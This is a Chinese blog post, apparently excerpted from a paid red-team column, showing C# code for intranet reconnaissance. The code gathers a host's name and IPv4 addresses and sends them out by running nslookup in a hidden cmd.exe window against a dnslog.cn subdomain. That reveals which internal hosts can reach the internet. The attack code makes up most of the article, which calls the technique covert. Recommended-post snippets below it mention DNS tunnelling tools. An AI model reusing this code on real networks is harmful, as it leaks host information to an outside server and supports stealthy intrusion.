.NET内网实战:通过DNS查找出网主机

于 2024-08-22 08:30:00 发布
阅读量356 收藏 3
点赞数 3
文章标签: .net 安全 web安全 矩阵 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/ahhacker86/article/details/141303247
版权

01阅读须知

此文所节选自小报童《.NET 内网实战攻防》专栏,主要内容有.NET在各个内网渗透阶段与Windows系统交互的方式和技巧,对内网和后渗透感兴趣的朋友们可以订阅该电子报刊,解锁更多的报刊内容。

02基本介绍

图片

03编码实现

在红队活动中,信息收集是内网渗透测试的首要步骤,了解内网中哪些主机可以连通外部网络,是攻击者成功渗透的关键之一。

3.1 获取主机IP

在内网环境下,通过扫描网段获得内网主机所有的IP地址,Environment.MachineName 获取计算机名,Dns.GetHostAddresses 获取主机的所有IP地址,并快速找到可以出网的主机。

string machineName = Environment.MachineName;
string hostName = Dns.GetHostName();
IPAddress[] hostAddresses = Dns.GetHostAddresses(hostName);

随后,将主机的所有IPv4地址和计算机名组合成一个唯一的标识符,这个标识符将用于DNS查询,具体代码如下所示。

foreach (IPAddress ipaddress in hostAddresses)
{
    if (ipaddress.AddressFamily == AddressFamily.InterNetwork)
    {
        str += ipaddress.ToString() + "-";
    }
}
string uniqueId = str + machineName;

3.2 命令执行

通过 Process类的Start方法执行 nslookup 命令,将生成的唯一标识符发送到指定的DNS服务器。这里使用了dnslog.cn域名,这是一种常见的DNS隧道工具,用于捕获并记录DNS查询,具体代码如下所示。

string dnsDomain = "ufu2ma.dnslog.cn"; 
string nslookupCmd = $"nslookup {uniqueId}.{dnsDomain}";
string result = RunCmd(nslookupCmd);

使用了自定义的RunCmd方法,其实内部是调用Process类完成执行命令。代码参考如下所示。

public string RunCmd(string cmd)
{
    this.proc.StartInfo.CreateNoWindow = true;
    this.proc.StartInfo.FileName = "cmd.exe";
    this.proc.StartInfo.UseShellExecute = false;
    this.proc.StartInfo.RedirectStandardError = true;
    this.proc.StartInfo.RedirectStandardInput = true;
    this.proc.StartInfo.RedirectStandardOutput = true;
    this.proc.Start();
    this.proc.StandardInput.WriteLine(cmd + "&exit");
    string result = this.proc.StandardOutput.ReadToEnd();
    this.proc.Close();
    return result;
}

综上,通过使用 Windows A利用.NET结合 nslookup 命令进行内网信息收集,是一种有效且隐蔽的方式,适用于红队活动中的快速发现可出网主机。想要了解完整或者更多的内网安全防御绕过方向的文章,可以移步订阅小报童《.NET 内网实战攻防》电子报刊。

04欢迎加入.NET 电子报刊

我们的小报童电子报刊【.NET内网安全攻防】也开始运营,引入小报童也是为了弥补知识星球对于轻量级阅读支持的不足,为用户读者提供更佳的阅读体验。如果您对阅读体验的需求比较高,那么可以订阅这个专栏。

本次电子报刊《.NET 内网安全攻防》专栏,内容主要有.NET在各个内网渗透阶段与Windows系统交互的方式和技巧,可细分为以下8个方向。

1) .NET 安全防御绕过
2) .NET 本地权限提升
3) .NET 内网信息收集
4) .NET 内网代理通道
5) .NET 内网横向移动
6) .NET 目标权限维持
7) .NET 数据传输外发
8) .NET 目标痕迹清理

图片

图片

通过DNS服务器架构解释DNS请求过程
村中少年的专栏
11-08 1221
本文将着重说明一下网络空间中DNS请求和响应的数据包是怎么流动的,会经过哪些设备DNS请求和响应的过程。
【项目实战DNS域名及DNS解析入门介绍
本本本添哥
03-31 382
互联上的站点就象我们生活中的机构或家庭一样要有个地址,民才能根据这个地址进行 访问。
asp.net得到本机ip地址和Mac地址
04-22
得到本机ip地址和Mac地址 得到本机ip地址和Mac地址
基于.Net Core开发的开源DNS服务器
dotNET跨平台
03-30 378
欢迎加入.Net编程学习小圈子,跟着学习路线,一起打卡交流学习。今天给大家推荐一个开源的DNS服务器,如果你工作或者生活,对网络监控有需求,这个开源项目绝对不错的。项目简介这是基于.Net Core开发的、开源的项目,可以让你拥有属于自己的DNS服务器,支持跨平台的,而且拥有非常友好的Web界面与监控。它可用于监控网络日志、提升站加载速度、屏蔽特定域名、加密等场景。技术架构1、平台:基于.Ne...
内网安全】——内网主机发现
Demo不是emo的博客
11-13 9244
内网渗透中,为了扩大战果,往往需要寻找更多主机并且对这些主机进行安全检测或帐号密码测试,所以主机发现这个步骤必不可少。那主机发现都有哪些方法呢?
C#/.NET获取本机的IP地址
weixin_30855761的博客
03-11 172
System.Net.IPHostEntry ips = System.Net.Dns.GetHostEntry(System.Net.Dns.GetHostName()); foreach (System.Net.IPAddress ip in ips.AddressList) { Console.WriteLine(ip.ToString()); } 转载于:https:...
.net获取本地ip地址
weixin_30378623的博客
07-24 846
整理代码,.net获取本地ip地址,代码如下: 1 string name = Dns.GetHostName(); 2 IPHostEntry IpEntry = Dns.GetHostEntry(name); 3 string ip = ""; 4 for (int i = 0; i < IpEntry.AddressList.Length; i++) 5 {...
红队内网攻防渗透:内网渗透之内网各种工具平台的使用
最新发布
HACKONE的博客
04-10 1032
红队内网攻防渗透内网各种工具平台的使用 内网各种工具平台的使用
红队内网攻防渗透:内网渗透之Windows内网信息收集:内网和域
HACKONE的博客
04-10 625
Telnet协议是tcp/ip协议的一员是Internet远程登陆服务的标准协议和主要方式,快速探测某台主机是否存在某个高危漏洞端口可以使用这个在内网中通常会部署大量的网络安全设备例如IDSIPS日志审计安全关反病毒等在域网络攻击测试中获取域内一个支点后需要获得域管理员权限在一个域中,当计算机加入域后会默认给域管理员组赋予本地系统管理员权限也就是说当计算机被添加到域中成为域主机系统就会自动将域管理员组添加到本地系统管理员组中因此域管理组的成员均可以访问本地计算机且具备完全的控制权。
网络性能调优实战:从Cisco Packet Tracer 6.0模拟中学优化
参考资源链接:[思科Packet Tracer 6.0正式版安装教程:中文汉化与配置指南](https://wenku.csdn.net/doc/66p96zr52v?spm=1055.2635.3001.10343) # 1. 网络性能调优概述 在当今数字化时代,网络性能调优是确保企业...
C# 写的DNS 解析服务器
07-24
用C#实现的一个DNS 解析服务器,非DnsClient 目前只是一个模型 修改和完善后可以实现一个DDNS Server
.NET 中获取本地IP的方法
ddx95572的博客
07-25 145
Dns.GetHostByName(Dns.GetHostName()).AddressList[0]; 转载于:https://www.cnblogs.com/likang/archive/2007/07/25/830989.html
[转载]C#获取本机IPv4地址
weixin_30462049的博客
04-24 447
C#获取本机IP地址在C#1.0之后都使用下面的这种形式: IPHostEntry ipe = Dns.GetHostEntry(Dns.GetHostName()); IPAddress ipa=ipe.AddressList[0]; AddressList是一个IPAddress[]类型,这里面存放了系统的所有IP地址,有IPv4的,有IPv6的,还有不同卡的也会在这里面。在W...
DNS变了,.NET应用程序需要重启吗?
farway000的博客
04-19 686
.NET】|总结/Edison Zhou1啥,DNS变了?相信很多童鞋所在公司在使用内网域名替代服务器IP写在了各种config文件中,比如数据库服务器、Redis服务器等等。Edison公司所在团队的DB是由DBA统一管理的,由于近一年来DB服务器会经常面临维护、升级、增加等,需要经常修改IP地址。因此,我们统一找运维配置了内网dns,将所有DB的IP地址改为内网...
c# winform DNS获得客户机的计算机名,IPHostEntry ,GetHostEntry
黑色头发
10-23 550
[code="c#"]IPHostEntry ipHostEntry = Dns.GetHostEntry(IPAddress.Parse("192.168.1.137"));[/code] 黑色头发:http://heisetoufa.iteye.com
C# 获取本地IP
悦儿尚儿的博客
11-20 435
C# 获取本地IP
C#中获得本机IP
li_yibin的专栏
07-16 350
//获得本机IP            System.Net.IPAddress[] ips = System.Net.Dns.GetHostAddresses(Environment.MachineName);            string strIP = "";            for (int i = 0; i             {                strIP
如何取得IP/用户名等信息
斯斯细语
11-12 1106
作者:DuSDong 在.NET中获取一台电脑名,IP地址及当前用户名是非常简单,以下是我常用的几种方法,如果大家还有其它好的方法,可以回复一起整理:  1. 在ASP.NET中专用属性:  获取服务器电脑名:Page.Server.ManchineName  获取用户信息:Page.User  获取客户端电脑名:Page.Request.UserHostName  获取客户端电脑IP:Page.
域控定位解析
m0_62207482的博客
03-07 548
端口探测定位:扫描内网中同时开放`389`、`636`与`53`的机器,`389`默认是`LDAP`协 议端口,`636`端口是`LDAPS`,`53`端口默认是DNS端口,主要用于域名解析,通过DNS服 务器可以实现域名与ip地址之间转换,他们都是域控机器开放的端口。扫描结果中根据:`CN=AD-SERVER,OU=Domain Controllers,DC=tubai,DC=com`来进行域控的定位。SPN扫描定位:由于`SPN`本身就是正常的`kerberos`请求,所以扫描隐蔽,它不同于。
DNS隧道攻防:内网安全实战与检测
"这篇内容是关于内网安全攻防的分享,特别关注DNS隧道的利用与防御,适合安全运维人员学习。文中详细介绍了如何利用powercat工具构建DNS隧道,进行内网穿透,以及如何在Kali Linux上设置dnscat2服务端进行监控。" ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

dot.Net安全矩阵

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值